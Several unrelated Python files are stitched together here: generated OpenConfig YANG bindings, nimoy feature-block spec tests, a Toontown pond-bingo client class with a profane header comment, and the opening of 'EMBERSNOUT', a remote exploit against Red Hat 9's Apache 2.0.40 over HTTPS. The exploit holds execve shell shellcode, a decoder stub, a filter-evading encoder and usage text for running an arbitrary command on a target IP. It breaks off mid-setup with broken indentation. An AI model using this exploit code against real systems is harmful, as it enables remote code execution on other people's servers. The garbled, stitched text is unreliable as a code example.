        Getter method for temporary_valid_lifetime, mapped from YANG variable /interfaces/interface/subinterfaces/subinterface/ipv6/autoconf/state/temporary_valid_lifetime (uint32)

        YANG Description: [adapted from IETF IP model RFC 7277]

The time period during which the temporary address
is valid.
        """
        return self.__temporary_valid_lifetime

    def _set_temporary_valid_lifetime(self, v, load=False):
        """
        Setter method for temporary_valid_lifetime, mapped from YANG variable /interfaces/interface/subinterfaces/subinterface/ipv6/autoconf/state/temporary_valid_lifetime (uint32)
        If this variable is read-only (config: false) in the
        source YANG file, then _set_temporary_valid_lifetime is considered as a private
        method. Backends looking to populate this variable should
        do so via calling thisObj._set_temporary_valid_lifetime() directly.

        YANG Description: [adapted from IETF IP model RFC 7277]

The time period during which the temporary address
is valid.
        """
        if hasattr(v, "_utype"):
            v = v._utype(v)
        try:
            t = self._make_uint32_leaf("temporary-valid-lifetime", 604800, v)
        except (TypeError, ValueError):
            raise ValueError(
                {
                    "error-string": """temporary_valid_lifetime must be of a type compatible with uint32""",
                    "defined-type": "uint32",
                    "generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)(604800), is_leaf=True, yang_name="temporary-valid-lifetime", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/interfaces/ip-ext', defining_module='openconfig-if-ip-ext', yang_type='uint32', is_config=False)""",
                }
            )
        self.__temporary_valid_lifetime = t
        if hasattr(self, "_set"):
            self._set()

    def _unset_temporary_valid_lifetime(self):
        self.__temporary_valid_lifetime = self._make_uint32_leaf(
            "temporary-valid-lifetime", 604800)

    def _get_temporary_preferred_lifetime(self):
        """
        Getter method for temporary_preferred_lifetime, mapped from YANG variable /interfaces/interface/subinterfaces/subinterface/ipv6/autoconf/state/temporary_preferred_lifetime (uint32)

        YANG Description: [adapted from IETF IP model RFC 7277]

The time period during which the temporary address is
preferred.
        """
        return self.__temporary_preferred_lifetime

    def _set_temporary_preferred_lifetime(self, v, load=False):
        """
        Setter method for temporary_preferred_lifetime, mapped from YANG variable /interfaces/interface/subinterfaces/subinterface/ipv6/autoconf/state/temporary_preferred_lifetime (uint32)
        If this variable is read-only (config: false) in the
        source YANG file, then _set_temporary_preferred_lifetime is considered as a private
        method. Backends looking to populate this variable should
        do so via calling thisObj._set_temporary_preferred_lifetime() directly.

        YANG Description: [adapted from IETF IP model RFC 7277]

The time period during which the temporary address is
preferred.
        """
        if hasattr(v, "_utype"):
            v = v._utype(v)
        try:
            t = self._make_uint32_leaf("temporary-preferred-lifetime", 86400, v)
        except (TypeError, ValueError):
            raise ValueError(
                {
                    "error-string": """temporary_preferred_lifetime must be of a type compatible with uint32""",
                    "defined-type": "uint32",
                    "generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)(86400), is_leaf=True, yang_name="temporary-preferred-lifetime", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/interfaces/ip-ext', defining_module='openconfig-if-ip-ext', yang_type='uint32', is_config=False)""",
                }
            )
        self.__temporary_preferred_lifetime = t
        if hasattr(self, "_set"):
            self._set()

    def _unset_temporary_preferred_lifetime(self):
        self.__temporary_preferred_lifetime = self._make_uint32_leaf(
            "temporary-preferred-lifetime", 86400)

    create_global_addresses = __builtin__.property(_get_create_global_addresses)
    create_temporary_addresses = __builtin__.property(_get_create_temporary_addresses)
    temporary_valid_lifetime = __builtin__.property(_get_temporary_valid_lifetime)
    temporary_preferred_lifetime = __builtin__.property(
        _get_temporary_preferred_lifetime
    )

    _pyangbind_elements = OrderedDict(
        [
            ("create_global_addresses", create_global_addresses),
            ("create_temporary_addresses", create_temporary_addresses),
            ("temporary_valid_lifetime", temporary_valid_lifetime),
            ("temporary_preferred_lifetime", temporary_preferred_lifetime),
        ]
    )
| |
from nimoy.runner.exceptions import InvalidFeatureBlockException
from nimoy.specification import Specification
from specs.nimoy.runner_helper import run_spec_contents
class ExpectBlocksSpec(Specification):
    """Specs for nimoy's feature blocks (given/setup/when/then/expect/where)
    and for exception assertions via ``thrown()``.

    Each test feeds a complete spec as source text to ``run_spec_contents``
    and asserts on the resulting unittest result object.  NOTE: ``given``,
    ``when``, ``then`` etc. are nimoy DSL context managers resolved by
    nimoy's AST transformation, not ordinary Python names; the embedded
    triple-quoted spec strings are executed by the runner and must be kept
    verbatim.
    """
    # A given + expect pair forms a valid feature and the expectation holds.
    def successful_given(self):
        with given:
            spec_contents = """from nimoy.specification import Specification
class JimbobSpec(Specification):
    def test(self):
        with given:
            a = 3
        with expect:
            a != 4
            """
        with when:
            result = run_spec_contents(spec_contents)
        with then:
            result.wasSuccessful() == True
    # setup is accepted in place of given.
    def successful_setup(self):
        with given:
            spec_contents = """from nimoy.specification import Specification
class JimbobSpec(Specification):
    def test(self):
        with setup:
            a = 3
        with expect:
            a != 4
            """
        with when:
            result = run_spec_contents(spec_contents)
        with then:
            result.wasSuccessful() == True
    # A setup block with no follow-up block is rejected.
    def dangling_setup(self):
        with given:
            spec_contents = """from nimoy.specification import Specification
class JimbobSpec(Specification):
    def test(self):
        with setup:
            a = 3
            """
        with when:
            run_spec_contents(spec_contents)
        with then:
            thrown(InvalidFeatureBlockException)
    # A given block with no follow-up block is rejected.
    def dangling_given(self):
        with given:
            spec_contents = """from nimoy.specification import Specification
class JimbobSpec(Specification):
    def test(self):
        with given:
            a = 3
            """
        with when:
            run_spec_contents(spec_contents)
        with then:
            thrown(InvalidFeatureBlockException)
    # when + then succeeds when the then expectation holds.
    def successful_when_then(self):
        with given:
            spec_contents = """from nimoy.specification import Specification
class JimbobSpec(Specification):
    def test(self):
        with when:
            a = 3
        with then:
            a != 4
            """
        with when:
            result = run_spec_contents(spec_contents)
        with then:
            result.wasSuccessful() == True
    # when + then fails when the then expectation does not hold.
    def failing_when_then(self):
        with given:
            spec_contents = """from nimoy.specification import Specification
class JimbobSpec(Specification):
    def test(self):
        with when:
            a = 3
        with then:
            a == 4
            """
        with when:
            result = run_spec_contents(spec_contents)
        with then:
            result.wasSuccessful() == False
    # A when block without a then block is rejected.
    def dangling_when(self):
        with given:
            spec_contents = """from nimoy.specification import Specification
class JimbobSpec(Specification):
    def test(self):
        with setup:
            a = 3
        with when:
            b = 4
            """
        with when:
            run_spec_contents(spec_contents)
        with then:
            thrown(InvalidFeatureBlockException)
    # A then block without a preceding when block is rejected.
    def dangling_then(self):
        with given:
            spec_contents = """from nimoy.specification import Specification
class JimbobSpec(Specification):
    def test(self):
        with setup:
            a = 3
        with then:
            a == 4
            """
        with when:
            run_spec_contents(spec_contents)
        with then:
            thrown(InvalidFeatureBlockException)
    # A lone expect block is a valid feature.
    def successful_expectation(self):
        with given:
            spec_contents = """from nimoy.specification import Specification
class JimbobSpec(Specification):
    def test(self):
        with expect:
            a = 3
            a != 4
            """
        with when:
            result = run_spec_contents(spec_contents)
        with then:
            result.wasSuccessful() == True
    # A failing expect expectation fails the spec.
    def failing_expectation(self):
        with given:
            spec_contents = """from nimoy.specification import Specification
class JimbobSpec(Specification):
    def test(self):
        with expect:
            a = 3
            a == 4
            """
        with when:
            result = run_spec_contents(spec_contents)
        with then:
            result.wasSuccessful() == False
    # Multiple expect blocks in one feature are allowed.
    def multiple_expectation(self):
        with given:
            spec_contents = """from nimoy.specification import Specification
class JimbobSpec(Specification):
    def test(self):
        with expect:
            a = 3
            a != 4
        with expect:
            a = [1, 2, 3]
            2 in a
            """
        with when:
            result = run_spec_contents(spec_contents)
        with then:
            result.wasSuccessful() == True
    # No block may follow a where block.
    def expect_after_where(self):
        with given:
            spec_contents = """from nimoy.specification import Specification
class JimbobSpec(Specification):
    def test(self):
        with where:
            pass
        with expect:
            2 != 1
            """
        with when:
            run_spec_contents(spec_contents)
        with then:
            thrown(InvalidFeatureBlockException)
    # Only one where block is allowed per feature.
    def double_where(self):
        with given:
            spec_contents = """from nimoy.specification import Specification
class JimbobSpec(Specification):
    def test(self):
        with where:
            pass
        with where:
            pass
            """
        with when:
            run_spec_contents(spec_contents)
        with then:
            thrown(InvalidFeatureBlockException)
    # thrown() in a then block matches the exception raised in when.
    def expected_exception(self):
        with given:
            spec_contents = """from nimoy.specification import Specification
class JimbobSpec(Specification):
    def test(self):
        with when:
            raise Exception('Whaaaaat')
        with then:
            thrown(Exception)
            """
        with when:
            result = run_spec_contents(spec_contents)
        with then:
            result.wasSuccessful() == True
    # thrown() also matches subclasses of the expected exception type.
    def expected_derived_exception(self):
        with given:
            spec_contents = """from nimoy.specification import Specification
class JimbobSpec(Specification):
    def test(self):
        with when:
            raise AssertionError('Whaaaaat')
        with then:
            thrown(Exception)
            """
        with when:
            result = run_spec_contents(spec_contents)
        with then:
            result.wasSuccessful() == True
    # An exception raised in when without a thrown() surfaces as an error.
    def unexpected_exception(self):
        with given:
            spec_contents = """from nimoy.specification import Specification
class JimbobSpec(Specification):
    def test(self):
        with when:
            raise Exception('Whaaaaat')
        with then:
            pass
            """
        with when:
            result = run_spec_contents(spec_contents)
        with then:
            "Exception: Whaaaaat" in result.errors[0][1]
            result.wasSuccessful() == False
    # thrown() returns exc_info; its message can be asserted on.
    def successful_exception_message_assertion(self):
        with given:
            spec_contents = """from nimoy.specification import Specification
class JimbobSpec(Specification):
    def test(self):
        with when:
            raise Exception('Whaaaaat')
        with then:
            err = thrown(Exception)
            str(err[1]) == 'Whaaaaat'
            """
        with when:
            result = run_spec_contents(spec_contents)
        with then:
            result.wasSuccessful() == True
    # Expecting the wrong exception type fails with a descriptive message.
    def failed_exception_type_assertion(self):
        with given:
            spec_contents = """from nimoy.specification import Specification
class JimbobSpec(Specification):
    def test(self):
        with when:
            raise Exception('Whaaaaat')
        with then:
            err = thrown(ArithmeticError)
            """
        with when:
            result = run_spec_contents(spec_contents)
            "'ArithmeticError' but found 'Exception'" in result.failures[0][1]
        with then:
            result.wasSuccessful() == False
    # A wrong message assertion on the thrown exception fails the spec.
    def failed_exception_message_assertion(self):
        with given:
            spec_contents = """from nimoy.specification import Specification
class JimbobSpec(Specification):
    def test(self):
        with when:
            raise Exception('Whaaaaat')
        with then:
            err = thrown(Exception)
            str(err[1]) == 'Moo'
            """
        with when:
            result = run_spec_contents(spec_contents)
        with then:
            "Expected: 'Moo'" in result.failures[0][1]
            result.wasSuccessful() == False
    # Expecting an exception that is never raised fails the spec.
    def unfulfilled_exception_expectation(self):
        with given:
            spec_contents = """from nimoy.specification import Specification
class JimbobSpec(Specification):
    def test(self):
        with when:
            pass
        with then:
            err = thrown(Exception)
            err.message == 'Whaaaaat'
            """
        with when:
            result = run_spec_contents(spec_contents)
        with then:
            "'Exception' to be thrown" in result.failures[0][1]
            result.wasSuccessful() == False
| |
# Fuck you Disyer. Stealing my fucking paypal. GET FUCKED: toontown.fishing.DistributedPondBingoManager
from panda3d.core import VBase4
from direct.distributed import DistributedObject
from direct.distributed.ClockDelta import *
from direct.directnotify import DirectNotifyGlobal
from direct.fsm import FSM
from direct.gui.DirectGui import *
from direct.task import Task
from toontown.fishing import BingoGlobals
from toontown.fishing import BingoCardGui
from toontown.fishing import FishGlobals
from toontown.fishing import NormalBingo
from toontown.fishing import FourCornerBingo
from toontown.fishing import DiagonalBingo
from toontown.fishing import ThreewayBingo
from toontown.fishing import BlockoutBingo
from direct.showbase import RandomNumGen
from toontown.toonbase import ToontownTimer
from toontown.toonbase import ToontownGlobals
from toontown.toonbase import TTLocalizer
import time
class DistributedPondBingoManager(DistributedObject.DistributedObject, FSM.FSM):
    """Client-side manager for a fishing pond's bingo mini-game.

    Mirrors the server's bingo session and drives the BingoCardGui through
    the FSM states Off, Intro, WaitCountdown, Playing, Reward, GameOver and
    Intermission.

    Fixes relative to the original:
    - enterOff tested the bound method ``self.card.getGame`` (always truthy)
      instead of calling it, so removeGame() ran even with no game attached.
    - Several filter/exit log messages carried copy-pasted wrong prefixes
      ('filterOff:'/'enterIntermission:') or named the wrong source state.
    - Locals named ``time`` shadowed the imported ``time`` module.
    """
    notify = DirectNotifyGlobal.directNotify.newCategory('DistributedPondBingoManager')
    # Maps a card-type id to the game-logic class implementing that
    # card's win condition.
    cardTypeDict = {BingoGlobals.NORMAL_CARD: NormalBingo.NormalBingo,
                    BingoGlobals.FOURCORNER_CARD: FourCornerBingo.FourCornerBingo,
                    BingoGlobals.DIAGONAL_CARD: DiagonalBingo.DiagonalBingo,
                    BingoGlobals.THREEWAY_CARD: ThreewayBingo.ThreewayBingo,
                    BingoGlobals.BLOCKOUT_CARD: BlockoutBingo.BlockoutBingo}

    def __init__(self, cr):
        """Initialize bookkeeping; the card GUI itself is built in generate()."""
        DistributedObject.DistributedObject.__init__(self, cr)
        FSM.FSM.__init__(self, 'DistributedPondBingoManager')
        self.cardId = 0            # server-assigned id of the current card
        self.jackpot = 0           # jackpot value for the current card type
        self.pond = None           # pond object we are attached to
        self.spot = None           # local toon's fishing spot, if any
        self.card = None           # BingoCardGui, created in generate()
        self.hasEntered = 0        # 1 once the local toon has joined the game
        self.initGameState = None  # state used to seed a newly built card
        self.lastCatch = None      # last caught fish, indexed [0]=genus, [1]=species
        self.typeId = BingoGlobals.NORMAL_CARD

    def generate(self):
        """Build the bingo card GUI when the distributed object materializes."""
        DistributedObject.DistributedObject.generate(self)
        self.card = BingoCardGui.BingoCardGui()
        self.card.reparentTo(aspect2d, 1)
        self.card.hideNextGameTimer()
        self.notify.debug('generate: DistributedPondBingoManager')

    def delete(self):
        """Destroy the GUI and break the pond <-> manager reference cycle."""
        self.pond.resetSpotGui()
        del self.pond.pondBingoMgr
        self.pond.pondBingoMgr = None
        del self.pond
        self.pond = None
        FSM.FSM.cleanup(self)
        self.card.destroy()
        del self.card
        self.notify.debug('delete: Deleting Local PondManager %s' % self.doId)
        DistributedObject.DistributedObject.delete(self)

    def d_cardUpdate(self, cellId, genus, species):
        """Tell the AI which fish was applied to which cell of our card."""
        self.sendUpdate('cardUpdate', [self.cardId,
                                       cellId,
                                       genus,
                                       species])

    def d_bingoCall(self):
        """Tell the AI that the local toon called bingo on this card."""
        self.sendUpdate('handleBingoCall', [self.cardId])

    def setCardState(self, cardId, typeId, tileSeed, gameState):
        """Server update describing the current card and its seed/state."""
        self.cardId = cardId
        self.typeId = typeId
        self.tileSeed = tileSeed
        self.jackpot = BingoGlobals.getJackpot(typeId)
        self.initGameState = gameState

    def checkForUpdate(self, cellId):
        """Cell-click callback: try to play the last caught fish on cellId."""
        if self.lastCatch is not None:
            genus = self.lastCatch[0]
            species = self.lastCatch[1]
            self.d_cardUpdate(cellId, genus, species)
            success = self.card.cellUpdateCheck(cellId, genus, species)
            if success == BingoGlobals.WIN:
                # The play completed a winning pattern: arm the bingo button.
                self.lastCatch = None
                self.enableBingo()
                self.pond.getLocalToonSpot().cleanupFishPanel()
                self.pond.getLocalToonSpot().hideBootPanel()
            elif success == BingoGlobals.UPDATE:
                # Valid play, no win yet; the catch is consumed either way.
                self.lastCatch = None
                self.pond.getLocalToonSpot().cleanupFishPanel()
                self.pond.getLocalToonSpot().hideBootPanel()
        else:
            self.notify.warning('CheckForWin: Attempt to Play Cell without a valid catch.')

    def updateGameState(self, gameState, cellId):
        """Server broadcast: sync the game state and mark a played cell."""
        game = self.card.getGame()
        if game is not None:
            game.setGameState(gameState)
            self.card.cellUpdate(cellId)

    def __generateCard(self):
        """(Re)build the card GUI for the current type/seed and recolor it."""
        self.notify.debug('__generateCard: %s' % self.typeId)
        if self.card.getGame():
            self.card.removeGame()
        game = self.__cardChoice()
        game.setGameState(self.initGameState)
        self.card.addGame(game)
        self.card.generateCard(self.tileSeed, self.pond.getArea())
        color = BingoGlobals.getColor(self.typeId)
        self.card.setProp('image_color', VBase4(color[0], color[1], color[2], color[3]))
        color = BingoGlobals.getButtonColor(self.typeId)
        self.card.bingo.setProp('image_color', VBase4(color[0], color[1], color[2], color[3]))
        if self.hasEntered:
            self.card.loadCard()
            self.card.show()
        else:
            self.card.hide()

    def showCard(self):
        """Reveal the card GUI appropriately for the current FSM state."""
        if self.state != 'Off' and self.card.getGame() != None:
            self.card.loadCard()
            self.card.show()
        elif self.state == 'GameOver':
            self.card.show()
        elif self.state == 'Reward':
            self.card.show()
        elif self.state == 'WaitCountdown':
            self.card.show()
            self.card.showNextGameTimer(TTLocalizer.FishBingoNextGame)
        elif self.state == 'Intermission':
            self.card.showNextGameTimer(TTLocalizer.FishBingoIntermission)
            self.card.show()
        self.hasEntered = 1

    def __cardChoice(self):
        """Instantiate the game-logic object for the current card type."""
        return self.cardTypeDict.get(self.typeId)()

    def checkForBingo(self):
        """Bingo-button callback: verify the win locally, then notify the AI."""
        success = self.card.checkForBingo()
        if success:
            self.d_bingoCall()
            self.request('Reward')

    def enableBingo(self):
        """Activate the bingo button now that the card has a winning line."""
        self.card.setBingo(DGG.NORMAL, self.checkForBingo)

    def setPondDoId(self, pondId):
        """Attach to our pond immediately, or as soon as it generates."""
        self.pondDoId = pondId
        if pondId in self.cr.doId2do:
            self.setPond(self.cr.doId2do[pondId])
        else:
            self.acceptOnce('generate-%d' % pondId, self.setPond)

    def setPond(self, pond):
        self.pond = pond
        self.pond.setPondBingoManager(self)

    def setState(self, state, timeStamp):
        """Server-driven FSM transition."""
        self.notify.debug('State change: %s -> %s' % (self.state, state))
        self.request(state, timeStamp)

    def setLastCatch(self, catch):
        """Remember the fish just caught so it can be played on the card."""
        self.lastCatch = catch
        self.card.fishCaught(catch)

    def castingStarted(self):
        if self.card:
            self.card.castingStarted()

    def setSpot(self, spot):
        self.spot = spot

    def setJackpot(self, jackpot):
        self.jackpot = jackpot

    def enterOff(self, args=None):
        """Dormant state: hide the card and clear per-session bookkeeping."""
        self.notify.debug('enterOff: Enter Off State')
        self.spot = None
        # Bug fix: the original tested ``self.card.getGame`` (the bound
        # method, always truthy) instead of calling it.
        if self.card.getGame():
            self.card.removeGame()
        self.card.hide()
        self.card.stopNextGameTimer()
        self.hasEntered = 0
        self.lastCatch = None

    def filterOff(self, request, args):
        """Allowed transitions out of Off; Reward is demoted to GameOver."""
        if request == 'Intro':
            return 'Intro'
        if request == 'WaitCountdown':
            return (request, args)
        if request == 'Playing':
            # Build the card first so it is ready when Playing is entered.
            self.__generateCard()
            self.card.setJackpotText(str(self.jackpot))
            return (request, args)
        if request == 'Intermission':
            return (request, args)
        if request == 'GameOver':
            return (request, args)
        if request == 'Reward':
            return ('GameOver', args)
        self.notify.debug('filterOff: Invalid State Transition from Off to %s' % request)

    def exitOff(self):
        self.notify.debug('exitOff: Exit Off State')

    def enterIntro(self, args=None):
        self.notify.debug('enterIntro: Enter Intro State')
        self.pond.setSpotGui()
        self.hasEntered = 1

    def filterIntro(self, request, args):
        if request == 'WaitCountdown':
            return (request, args)
        self.notify.debug('filterIntro: Invalid State Transition from Intro to %s' % request)

    def exitIntro(self):
        self.notify.debug('exitIntro: Exit Intro State')

    def enterWaitCountdown(self, timeStamp):
        """Count down to the next game using the server's timestamp."""
        self.notify.debug('enterWaitCountdown: Enter WaitCountdown State')
        # Renamed from ``time``, which shadowed the imported time module.
        timeLeft = BingoGlobals.TIMEOUT_SESSION - globalClockDelta.localElapsedTime(timeStamp[0])
        self.card.startNextGameCountdown(timeLeft)
        if self.hasEntered:
            self.card.showNextGameTimer(TTLocalizer.FishBingoNextGame)

    def filterWaitCountdown(self, request, args):
        if request == 'Playing':
            return (request, args)
        # Message prefix fixed (originally said 'filterOff:').
        self.notify.debug('filterWaitCountdown: Invalid State Transition from WaitCountdown to %s' % request)

    def exitWaitCountdown(self):
        self.notify.debug('exitWaitCountdown: Exit WaitCountdown State')
        if self.pond:
            self.__generateCard()
            self.card.setJackpotText(str(self.jackpot))
        self.card.resetGameTimer()
        self.card.hideNextGameTimer()

    def enterPlaying(self, timeStamp):
        """Active game: start the countdown and make the card clickable."""
        self.notify.debug('enterPlaying: Enter Playing State')
        self.lastCatch = None
        session = BingoGlobals.getGameTime(self.typeId)
        # Renamed from ``time``, which shadowed the imported time module.
        timeLeft = session - globalClockDelta.localElapsedTime(timeStamp[0])
        self.card.startGameCountdown(timeLeft)
        self.card.enableCard(self.checkForUpdate)

    def filterPlaying(self, request, args):
        if request == 'Reward':
            return (request, args)
        if request == 'GameOver':
            return (request, args)
        # Message prefix fixed (originally said 'filterOff:').
        self.notify.debug('filterPlaying: Invalid State Transition from Playing to %s' % request)

    def exitPlaying(self):
        self.notify.debug('exitPlaying: Exit Playing State')
        self.card.resetGameTimer()

    def enterReward(self, timeStamp):
        """Local toon won: show the victory banner and pay the jackpot."""
        self.notify.debug('enterReward: Enter Reward State')
        if self.card:
            self.card.setBingo()
            self.card.removeGame()
            self.card.setGameOver(TTLocalizer.FishBingoVictory)
            localToonSpot = self.pond.getLocalToonSpot()
            if localToonSpot:
                localToonSpot.setJarAmount(self.jackpot)
            self.jackpot = 0

    def filterReward(self, request, args):
        if request == 'WaitCountdown':
            return (request, args)
        if request == 'Intermission':
            return (request, args)
        if request == 'Off':
            return 'Off'
        # Message prefix fixed (originally said 'filterOff:').
        self.notify.debug('filterReward: Invalid State Transition from Reward to %s' % request)

    def exitReward(self):
        self.notify.debug('exitReward: Exit Reward State')
        self.card.setGameOver('')

    def enterGameOver(self, timeStamp):
        """Game ended without a local win: clear the card, show banner."""
        self.notify.debug('enterGameOver: Enter GameOver State')
        self.card.setBingo()
        self.card.removeGame()
        self.card.setGameOver(TTLocalizer.FishBingoGameOver)

    def filterGameOver(self, request, args):
        if request == 'WaitCountdown':
            return (request, args)
        if request == 'Intermission':
            return (request, args)
        if request == 'Off':
            return 'Off'
        # Message prefix fixed (originally said 'filterOff:').
        self.notify.debug('filterGameOver: Invalid State Transition from GameOver to %s' % request)

    def exitGameOver(self):
        self.notify.debug('exitGameOver: Exit GameOver State')
        self.card.setGameOver('')
        self.card.resetGameTypeText()

    def enterIntermission(self, timeStamp):
        """Hourly break between sessions: show the break countdown."""
        self.notify.debug('enterIntermission: Enter Intermission State')
        if self.hasEntered:
            self.card.showNextGameTimer(TTLocalizer.FishBingoIntermission)
        self.notify.debug('enterIntermission: timestamp %s' % timeStamp[0])
        elapsedTime = globalClockDelta.localElapsedTime(timeStamp[0])
        self.notify.debug('enterIntermission: elapsedTime %s' % elapsedTime)
        waitTime = BingoGlobals.HOUR_BREAK_SESSION - elapsedTime
        self.notify.debug('enterIntermission: waitTime %s' % waitTime)
        self.card.startNextGameCountdown(waitTime)

    def filterIntermission(self, request, args):
        if request == 'WaitCountdown':
            return (request, args)
        if request == 'Off':
            return 'Off'
        # Message fixed: this guards Intermission, not GameOver.
        self.notify.warning('filterIntermission: Invalid State Transition from Intermission to %s' % request)

    def exitIntermission(self):
        # Prefix fixed from 'enterIntermission:' in the original.
        self.notify.debug('exitIntermission: Exit Intermission State')
| |
#!/usr/bin/env python
# EMBERSNOUT...a remote exploit against Red Hat 9.0's httpd-2.0.40-21
# via TCP port 443 (https)
import exceptions
import httplib
import random
import socket
import string
import sys
import time
# Generic exception class, to get us out of the topmost loop, if needed...
class WhackLoopException(exceptions.Exception):
    """Raised to break out of the topmost attack loop."""

    def __init__(self, args=None):
        # Stash whatever context the raiser supplied (may be None).
        self.args = args
# Server banner of the targeted vulnerable build.
target_server_version_check = 'Server: Apache/2.0.40 (Red Hat Linux)';
# Sets of response fragments that mark the target as NOT exploitable,
# keyed by the Apache config directive believed responsible.
not_vulnerable_strings = {}
# This one occurs when the 'UseCanonicalName On' directive is
# specified, turning off inclusion of our injected hostname
# during construction of the redirection string...8^(...
not_vulnerable_strings['UseCanonicalName On'] = \
    ('400 Bad', \
    'Your browser', \
    'sent a request that', \
    'this server could not understand.', \
    '<address>', \
    'Apache/2.0.40', \
    '</address>', \
    '</body>', \
    '</html>')
# This one occurs when the 'Options IncludesNoExec' directive is
# missing from the...
#    <IfModule mod_include.c>
#        <Directory "/var/www/error">
#    </IfModule>
# ...specification set...
not_vulnerable_strings['Options IncludesNoExec'] = \
    ('<!--#set var="TITLE" value="Bad request!" -->', \
    '<!--#include virtual="include/top.html" -->', \
    'Your browser (or proxy) sent a request that', \
    'this server could not understand.', \
    '<!--#include virtual="include/bottom.html" -->')
# Initial (pre-encoded) shellcode...
# Looks like an x86 Linux execve("/bin//sh", ..., "-c", cmd) stub
# (push '//sh'/'/bin', mov al,0xb, int 0x80) -- TODO confirm via disassembly.
# The user-supplied command string is appended between front and back.
plain_cmdshellcode_front = \
    '\xeb\x22' + \
    '\x59' + \
    '\x31\xc0' + \
    '\x50' + \
    '\x68''//sh' + \
    '\x68''/bin' + \
    '\x89\xe3' + \
    '\x50' + \
    '\x66\x68''-c' + \
    '\x89\xe7' + \
    '\x50' + \
    '\x51' + \
    '\x57' + \
    '\x53' + \
    '\x89\xe1' + \
    '\x99' + \
    '\xb0\x0b' + \
    '\xcd\x80' + \
    '\xe8\xd9\xff\xff\xff'
# Some bytes of NULL to terminate the argument list...
plain_cmdshellcode_back = \
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00"
# shellcode thawer...runtime decoder stub paired with encoder_wench()
# below, which nibble-encodes the payload to survive Apache's filtering.
decoder_wench = \
    '\x74\x3f\x75\x3d\x8a\x1e\x80\xeb\x61\x30\xd8\x81\xc6\x02\x01\x01' + \
    '\x01\x81\xee\x01\x01\x01\x01\xc3\x8b\x34\x24\x89\xf7\x31\xc0\xe8' + \
    '\xe0\xff\xff\xff\x80\xfb\x19\x74\x1d\xc1\xe0\x04\xe8\xd3\xff\xff' + \
    '\xff\x88\x07\x81\xc7\x02\x01\x01\x01\x81\xef\x01\x01\x01\x01\xeb' + \
    '\xdc\xe8\xd2\xff\xff\xff'
# Jump us forward from start of buffer to buffer+0x30 (shellcode)...
# originally... (jmp +0x2e, padded with two NOPs)
jump_me_baby = '\xeb\x2e\x90\x90'
jump_me_baby_length = len(jump_me_baby);
# Candidate stack offsets for the pool-pointer copies: the full sweep used
# in "thorough" mode, and the single-shot list used in "quick" mode.
thorough_stack_offset_list = [ -0x201c, -0x200c, -0x1fec, -0x1fe8, -0x1fac, -0x1c, 0x0, 0x68, 0x98, 0xa4, 0x118, 0x124, 0x134, 0x144, 0x154, 0x164, 0x170, 0x184 ]
quick_stack_offset_list = [ 0x0 ]
# Dedup/occurrence map of pool-pointer values already thrown at the target.
attempted_whack_pool_pointers = {}
def bad_address_byte(byte_to_check):
    """Return 1 if this byte cannot survive inside an injected address.

    Uppercase letters and the NUL/LF/CR bytes are mangled or rejected on
    the way through the request, so addresses containing them are unusable.
    """
    forbidden = (chr(0x0), chr(0xa), chr(0xd))
    if byte_to_check.isupper():
        return 1
    if byte_to_check in forbidden:
        return 1
    return 0
def bad_data_byte(byte_to_check):
    """Return 1 if this payload byte would be eaten by the server's filter.

    Disallowed: NUL/LF/CR plus the ranges 0x01-0x30, 0x3c-0x40, 0x5b-0x60
    and 0x7b-0x7e (inclusive); everything else passes.
    """
    if byte_to_check in (chr(0x0), chr(0xa), chr(0xd)):
        return 1
    bad_ranges = ((chr(0x1), chr(0x30)),
                  (chr(0x3c), chr(0x40)),
                  (chr(0x5b), chr(0x60)),
                  (chr(0x7b), chr(0x7e)))
    for low, high in bad_ranges:
        if low <= byte_to_check <= high:
            return 1
    return 0
def bogus_ass_address_bytes(address_to_check):
    """Scan all four bytes of a 32-bit address for filter-unsafe values.

    Returns (count, bytes): how many of the address's bytes fail
    bad_address_byte(), and the offending bytes themselves (big-endian
    order, as single-character strings).
    """
    offending = []
    for shift in (24, 16, 8, 0):
        candidate = chr((address_to_check >> shift) & 0xff)
        if bad_address_byte(candidate):
            offending.append(candidate)
    return (len(offending), offending)
def encoder_wench(input_string):
    """Nibble-encode a payload so every byte survives the server's filter.

    Each input byte becomes two lowercase letters: 'a' + high nibble and
    'a' + low nibble (so the alphabet is 'a'..'p'). A single 'z' (0x7a)
    terminates the encoding. Returns the encoding as a list of characters.
    """
    encoded = []
    for ch in input_string:
        value = ord(ch)
        encoded.append(chr(0x61 + ((value >> 4) & 0xf)))
        encoded.append(chr(0x61 + (value & 0xf)))
    # 'z' as the terminator...
    encoded.append(chr(0x7a))
    return encoded
def usage(command_name):
    """Print the command-line help text for this exploit and return None."""
    help_lines = (
        '\n',
        'Usage -> %s ip port packet_size start_ebp end_ebp ebp_inc hex_pad_byte "cmd"\n' % (command_name),
        'where...\n',
        '\tip............target IP address',
        '\tport..........target httpd TCP port number (usually 443)',
        '\tpacket_size...attack packet length in bytes',
        '\tstart_ebp.....guessed %ebp value to start with',
        '\tend_ebp.......guessed %ebp value to end with',
        '\tebp_inc.......how many stack bytes to bump %ebp each time',
        '\thex_pad_byte..packet filling byte (0x0 will do randomized fill)',
        '\t"cmd".........ASCII command string to be executed on target',
        '\n',
    )
    # Single-argument print(...) emits identical output under Python 2's
    # print statement, so this stays byte-compatible with the original.
    for line in help_lines:
        print(line)
    return
# ============================================================================
# ============= Executable code...
# ============================================================================
print "Arguments: ", sys.argv
# ============================================================================
# ============= Argument fetching...
# ============================================================================
if (len(sys.argv) != 9):
# BONK!!!
usage(sys.argv[0])
sys.exit(0)
server_address = sys.argv[1]
port = int(sys.argv[2], 10)
packet_size = long(sys.argv[3], 10)
whack_frame_pointer = start_address = long(sys.argv[4], 16)
# In case we need this functionality...
random_generator = random.Random(whack_frame_pointer)
# ============================================================================
# NOTE: We find the address of the start of our (filtered) buffer to be at
# offset 0x14 from the start of apr_pstrcat()'s frame pointer. We're
# going to use this address as the "apr_memnode_t *active" from the
# bogus "apr_pool_t" structure pointed to by whack_pool_pointer.
